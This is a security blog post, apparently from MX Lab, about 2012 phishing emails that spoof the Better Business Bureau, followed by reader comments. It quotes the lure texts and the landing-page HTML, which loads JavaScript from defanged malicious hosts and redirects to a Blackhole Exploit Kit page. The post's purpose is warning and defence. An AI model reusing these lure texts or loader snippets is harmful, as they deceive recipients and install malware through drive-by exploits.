Emails “BBB Complaint activity report” is an email security risk


MX Lab, http://www.mxlab.eu, started to intercept a new email based security risk with subjects like:

BBB Complaint activity report
BBB Case #9782213

The email is send from “Better Business Bureau” with a spoofed emailaddress in the form of DD3A0C27@domain.tld (random numbers and letters in capitals) in and has the following body:

Dear business owner, we have received a complaint about your company possible involvement in check cashing and Money Order Scam.

You are asked to provide response to this complaint within 7 days.

Failure to provide the necessary information will result in downgrading your Better Business Bureau rating and possible cancellation of your BBB accreditation status.

Complaint ID#793354020

Council of Better Business Bureaus
3033 Wilson Blvd, Suite 600
Arlington, VA 22201
Phone: 1 (703) 276.0100
Fax: 1 (703) 525.8277

Image screenshot of the email:

A second version is sent from the spoofed email address “customer_reviews@boston.bbb.org” and with the subject “BBB – Read Your Customer Review”:

One of your customers has submitted a review of your company.

The Customer Review has NOT yet been posted in your BBB Business Review.

You can read the Customer Review and at your option provide a comment by logging into your BBB account.

Please login and use the link below.

http://www.bbb.org/boston/login/504/

Your BBB ID: 84167
Your emails is: rosara@famous.be

All Customer Reviews are posted after one full business day.

Note:You can login to your BBB account and submit a comment to any Customer Review at any time.

Thank you.

Questions?
BBB
290 Donald Lynch Boulevard, Suite 102
Marlborough, MA 01752-4705
508-652-4800
customer_reviews@boston.bbb.org

Email ID: bcebfb9b
To confirm this email please login it at http://www.bbb.org/boston/login.

This mailing was sent to ****@*****.be.

This message is being sent to you by Better Business Bureau Serving Eastern Massachusetts, Maine, Rhode Island and Vermont.

The malicious URL leads to a web page that loads a Javascript:

<html>
<h1>WAIT·PLEASE</h1>
·<h3>Loading…</h3>
·<script·type=”text/javascript”·src=”hxxp://www.studiodans.ro/33GP6BbG/js.js”></script>
</html>

Another example:

<html>
<h1>WAIT·PLEASE</h1>
·<h3>Loading...</h3>
·<script·type="text/javascript"·src="hxxp://mabuhay63.com/q9Vgqgen/js.js"></script>
<script·type="text/javascript"·src="hxxp://pst.org.br/Wi4aFSLZ/js.js"></script>
</html>

Again, this Javascript contains contains the folowing code to open a document on another host:

document.location='hxxp://108.178.59.11/links/deep_recover-result.php';

We have found an analysis of the obfuscated Javascript and it appears that this is the Blackhole Exploit Kit (BHEK), perhaps version 2.0, in action. BHEK has the possibility to exploit multiple vulnerabilities in Java Runtime Environment (JRE), Flash and Adobe Reader.

You can find the original announcement regrading the Blackhole Exploit Kit (BHEK) v2 on pastebin or read the translated version.

Recommendation: when receiving such an email, put it in the trash or remove it from your system and most important do not click on any malicious URLs.

8 Responses to Emails “BBB Complaint activity report” is an email security risk

  1. lbsheehan says:

    Yep. I have received two this morning. I don’t open and put in spam folder.

  2. Email User says:

    Yup, same here, with following email:
    Better Business Bureau

  3. Frustrated says:

    Somebody is sending out these emails using our company domain as their email address. As a result we are getting dozens of emails bouncing back to our server everyday. Any idea how to stop it??!!

    • Ryan says:

      Look into adding an SPF record to your domain name. It won’t stop anything right away but in the long term it’ll help.

  4. Ryan says:

    I’m receiving about 4 of these every minute. Luckily Google is catching 99% of them.

  5. Joe Jumper says:

    Wondering WHY is BBB or FBI not taking care of that “business”?

  6. mks says:

    Latest with attachment

    The details of the consumer’s concern are contained in enclosed document. Please give attention to this issue and inform us about your opinion as soon as possible.

    We kindly ask you to open the COMPLAINT REPORT (attached to this email) to reply on this complaint.
    We are looking forward to your prompt response.
    Faithfully yours,
    Jaclyn Simon
    Dispute Counselor
    Better Business Bureau

  7. cdp says:

    Looks like my known spam folder wound up with this one today. Saved the source info and promptly deleted the email. Funny thing is I don’t have any business for anyone to complain about, I don’t run one at all!!!

    The source info below:

    “Return-Path:
    Received: from xx-xxxxxx.xxx.xx.xxxxxxxx.xxx ([xxx.xx.xxx.xxx])
    by xxx-xxxxxxx.xxx.xx.xxxxxxxx.xxx (xxxxxxxx SMTP Server) with SMTP id xxxxxxxxxxxxxxxxxxxx; Fri, 30 Nov 2012 17:44:44 -0500 (EST)
    Received: from mail.maillance.com ([66.132.174.110])
    by xx-xxxxxx.xxx.xx.xxxxxxxx.xxx (xxxxxxxx SMTP Server) with xSMTP id xxxxxxxxxxxxxxxxxxxx; Fri, 30 Nov 2012 17:43:28 -0500 (EST)
    Received: from ([127.0.0.1]) with MailEnable xSMTP; Fri, 30 Nov 2012 17:28:13 -0500
    Message-ID:
    Date: Sat, 01 Dec 2012 02:16:07 +0400
    Reply-To: “Better Business Bureau”
    From: “Better Business Bureau” ”

    [followed by a string of quite a lot of email addresses]

    “Subject: Please review your customer�s complaint
    Content-Type: multipart/mixed;
    boundary=”————735385810242715076207212″ ”

    [Crossed out all the other stuff, but the important info is still there]

Follow

Get every new post delivered to your Inbox.

Join 340 other followers

%d bloggers like this: